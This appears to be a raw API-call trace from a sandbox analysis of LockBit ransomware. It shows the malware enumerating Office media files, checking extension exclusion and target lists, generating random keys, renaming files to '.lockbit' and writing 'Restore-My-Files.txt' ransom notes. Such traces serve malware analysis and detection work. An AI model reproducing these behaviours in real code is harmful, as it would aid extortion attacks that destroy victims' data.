lstrcmpiW (lpString1="iconcache.db", lpString2="J0229389.WMF") returned -1 [0197.117] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.117] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF") returned=".WMF" [0197.118] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.118] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.118] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.119] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.119] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.119] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.119] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.119] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF.lockbit") returned 70 [0197.119] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0229389.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0197.120] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.120] malloc (_Size=0x40068) returned 0x3d70450 [0197.120] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3808) returned 1 [0197.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0197.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0197.122] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0197.126] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.126] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.126] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.128] free (_Block=0x1fa2ed8) [0197.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.128] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.128] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd64900, ftCreationTime.dwHighDateTime=0x1bc82e4, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6fd64900, ftLastWriteTime.dwHighDateTime=0x1bc82e4, nFileSizeHigh=0x0, nFileSizeLow=0x30da, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0230876.WMF", cAlternateFileName="")) returned 1 [0197.128] lstrcmpiW (lpString1=".", lpString2="J0230876.WMF") returned -1 [0197.128] lstrcmpiW (lpString1="..", lpString2="J0230876.WMF") returned -1 [0197.128] PathFindExtensionW (pszPath="J0230876.WMF") returned=".WMF" [0197.128] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.129] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.130] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.130] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0230876.WMF") returned 1 [0197.131] lstrcmpiW (lpString1="ntldr", lpString2="J0230876.WMF") returned 1 [0197.131] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0230876.WMF") returned 1 [0197.131] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0230876.WMF") returned -1 [0197.131] lstrcmpiW (lpString1="autorun.inf", lpString2="J0230876.WMF") returned -1 [0197.131] lstrcmpiW (lpString1="thumbs.db", lpString2="J0230876.WMF") returned 1 [0197.131] lstrcmpiW (lpString1="iconcache.db", lpString2="J0230876.WMF") returned -1 [0197.131] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.131] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF") returned=".WMF" [0197.131] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.131] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.131] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.132] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.132] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF.lockbit") returned 70 [0197.132] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0230876.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.134] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.134] malloc (_Size=0x40068) returned 0x3df0008 [0197.134] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12506) returned 1 [0197.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.135] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.140] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.140] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.141] free (_Block=0x1fa2ed8) [0197.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.141] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.142] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe1b900, ftCreationTime.dwHighDateTime=0x1be516b, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xabe1b900, ftLastWriteTime.dwHighDateTime=0x1be516b, nFileSizeHigh=0x0, nFileSizeLow=0x77f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233018.WMF", cAlternateFileName="")) returned 1 [0197.142] lstrcmpiW (lpString1=".", lpString2="J0233018.WMF") returned -1 [0197.142] lstrcmpiW (lpString1="..", lpString2="J0233018.WMF") returned -1 [0197.142] PathFindExtensionW (pszPath="J0233018.WMF") returned=".WMF" [0197.142] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.142] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.143] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.143] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233018.WMF") returned 1 [0197.144] lstrcmpiW (lpString1="ntldr", lpString2="J0233018.WMF") returned 1 [0197.144] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233018.WMF") returned 1 [0197.144] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233018.WMF") returned -1 [0197.144] lstrcmpiW (lpString1="autorun.inf", lpString2="J0233018.WMF") returned -1 [0197.144] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233018.WMF") returned 1 [0197.144] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233018.WMF") returned -1 [0197.144] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.144] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF") returned=".WMF" [0197.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.144] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.144] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.145] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.145] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF.lockbit") returned 70 [0197.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233018.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0197.147] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.147] malloc (_Size=0x40068) returned 0x3f70048 [0197.147] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=30704) returned 1 [0197.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0197.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0197.148] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0197.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.152] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.153] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.154] free (_Block=0x1fa2ed8) [0197.154] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.154] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.154] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c43c200, ftCreationTime.dwHighDateTime=0x1be1b5b, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3c43c200, ftLastWriteTime.dwHighDateTime=0x1be1b5b, nFileSizeHigh=0x0, nFileSizeLow=0x1522, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233070.WMF", cAlternateFileName="")) returned 1 [0197.154] lstrcmpiW (lpString1=".", lpString2="J0233070.WMF") returned -1 [0197.154] lstrcmpiW (lpString1="..", lpString2="J0233070.WMF") returned -1 [0197.155] PathFindExtensionW (pszPath="J0233070.WMF") returned=".WMF" 